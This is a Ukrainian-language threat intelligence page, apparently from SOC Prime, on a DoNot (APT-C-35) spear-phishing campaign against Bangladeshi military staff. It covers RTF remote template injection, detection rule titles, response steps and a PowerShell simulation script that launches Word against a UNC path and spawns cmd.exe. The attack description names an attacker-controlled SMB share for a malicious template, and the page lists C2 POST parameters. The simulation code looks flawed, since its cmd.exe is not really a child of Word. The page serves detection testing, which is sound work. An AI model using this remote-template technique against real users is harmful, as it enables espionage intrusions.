SOC Prime Bias: Критичний

16 Jul 2026 13:50 UTC

Відстеження вторгнення DoNot (APT-C-35) проти військовослужбовців Бангладешу

Author Photo
SOC Prime Team linkedin icon Стежити
Відстеження вторгнення DoNot (APT-C-35) проти військовослужбовців Бангладешу
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Цілеспрямована кібер-шпигунська операція, що приписується групі DoNot, також відома як APT-C-35, націлена на військових і оборонних фахівців у Бангладеш. Кампанія використовує озброєні RTF документи з ін’єкцією віддаленого шаблону для активації багаторівневого ланцюга зараження, який доставляє шеллкод і DLL імплант. Зловмисне програмне забезпечення покладається на шифрування AES-128-CBC і маскує свою активність командування та контролю і стійкість під легітимну телеметрію OneDrive.

Розслідування

Команда Howler Cell виявила кампанію під час аналізу фішингового RTF луру, поданого як військова біографія. Під час розслідування дослідники успішно вилучили живий DLL другого етапу, ejtest.dll, з активної інфраструктури командування та контролю, підтверджуючи, що операція залишалася активною. Криптографічний аналіз закодованих ключів AES надав вагомі докази зв’язку активності з раніше задокументованими операціями DoNot.

Захист

Захисники повинні контролювати додатки Microsoft Office на предмет завантаження віддалених шаблонів та несподіваних вихідних мережевих з’єднань. Важливо запровадити суворий контроль за виконанням макросів і стежити за підозрілими дочірніми процесами, запущеними з додатків Office. Крім того, організації повинні бути пильними на заплановані завдання, які імітують легітимну системну телеметрію, включаючи активність, пов’язану з OneDrive.

Відповідь

Якщо ця активність виявлена, уражені хости слід ізолювати негайно, щоб зупинити подальше доставлення багаторівневих корисних навантажень. Слідчі повинні переглянути файли, збережені в %TEMP% каталогах та перевірити заплановані завдання, що імітують поведінку OneDrive. Також слід провести більш широке полювання за HTTPS POST трафіком, що містить відомі параметри командування і контролю, такі як mopd= and malp=.

Потік Атаки

Детекції

Можливе виявлення віддаленої системи або перевірка підключення (за допомогою командного рядка)

Команда SOC Prime
16 липня 2026

Підозріле виконання шляху з Rundll32 Dll (за допомогою створення процесу)

Команда SOC Prime
16 липня 2026

Підозріле заплановане завдання (за допомогою аудиту)

Команда SOC Prime
16 липня 2026

IOC (HashSha256) для виявлення: від Біографії до Відкату: відстеження вторгнення DoNot (APT-C-35), націленого на військових Бангладеш

Правила AI від SOC Prime
16 липня 2026

IOC (SourceIP) для виявлення: від Біографії до Відкату: відстеження вторгнення DoNot (APT-C-35), націленого на військових Бангладеш

Правила AI від SOC Prime
16 липня 2026

IOC (DestinationIP) для виявлення: від Біографії до Відкату: відстеження вторгнення DoNot (APT-C-35), націленого на військових Бангладеш

Правила AI від SOC Prime
16 липня 2026

Виявлення зв’язку з серверами C2 групи DoNot [Мережеве підключення Windows]

Правила AI від SOC Prime
16 липня 2026

Виявлення ін’єкції шеллкоду через виклики API [Sysmon Windows]

Правила AI від SOC Prime
16 липня 2026

Ін’єкція віддаленого шаблону додатків Microsoft Office [Створення процесу Windows]

Правила AI від SOC Prime
16 липня 2026

Виконання Симуляції

Передумова: Телеметрія і перевірка базової лінії перед полетом повинні були бути успішними.

Пояснення: Цей розділ описує точне виконання техніки супротивника (TTP), розробленої для активації правила детекції. Команди і розповідь ПОВИННІ безпосередньо відображати ідентифіковані TTPs і прагнути генерувати точну телеметрію, очікувану логікою детекції. Абстрактні або невідповідні приклади призведуть до неправильної діагностики.

  • Опис атаки та команди: Атакуючий надсилає фішинговий електронний лист, що містить файл .docx . Документ містить шкідливе відношення, яке вказує на віддалений шаблон, розміщений на SMB-розшаренні під керуванням атакуючого (наприклад, \attacker-ipsharemalicious.dotm). Коли користувач відкриває файл, Word намагається отримати шаблон, створюючи командний рядок по шляху UNC. Щоб отримати виконання, шаблон містить макрос, який активує cmd.exe як дочірній процес WINWORD.EXE, намагаючись завантажити подальші корисні навантаження.

  • Сценарій перевірки регресії:

    # Сценарій симуляції для ін'єкції віддаленого шаблону Office та порожження дочірнього процесу
    
    # 1. Симулюйте виявлення шляху UNC (Вибір 1/2)
    # Примітка: Ми симулюємо командний рядок, який би побачили, якби Word обробив віддалений шаблон.
    Write-Host "[*] Симуляція доступу Word до віддаленого шаблону через шлях UNC..."
    Start-Process "winword.exe" -ArgumentList "\192.168.1.100publictemplate.dotm"
    
    Start-Sleep -Seconds 2
    
    # 2. Симуляція шкідливого дочірнього процесу (Вибір 3/4)
    # Це імітує виконання макросу cmd.exe з внутрішньо Word.
    Write-Host "[*] Симуляція шкідливого дочірнього процесу (cmd.exe), що породжується WINWORD.EXE..."
    $wordProcess = Start-Process "winword.exe" -PassThru
    Start-Sleep -Seconds 2
    
    # Використання Start-Process, щоб гарантовано зафіксувати зв'язок батька-дитини Sysmon
    Start-Process "cmd.exe" -ArgumentList "/c echo 'Exploit Success'" -WorkingDirectory $wordProcess.Path
    
    Write-Host "[+] Симуляція завершена. Перевірте журнали Sysmon для події ID 1."
  • Команди очищення:

    # Завершити всі залишкові процеси Office
    Stop-Process -Name "winword" -ErrorAction SilentlyContinue
    Stop-Process -Name "excel" -ErrorAction SilentlyContinue
    Write-Host "[+] Очищення завершено."